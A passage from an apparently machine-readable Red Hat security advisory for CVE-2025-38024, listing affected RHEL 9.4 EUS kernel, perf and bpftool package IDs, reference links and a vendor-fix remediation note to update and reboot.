"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38024"
},
{
"category": "external",
"summary": "RHBZ#2373354",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373354"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38024",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38024"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025061847-CVE-2025-38024-2904@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025061847-CVE-2025-38024-2904@gregkh/T"
}
],
"release_date": "2025-06-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-11T01:14:40+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
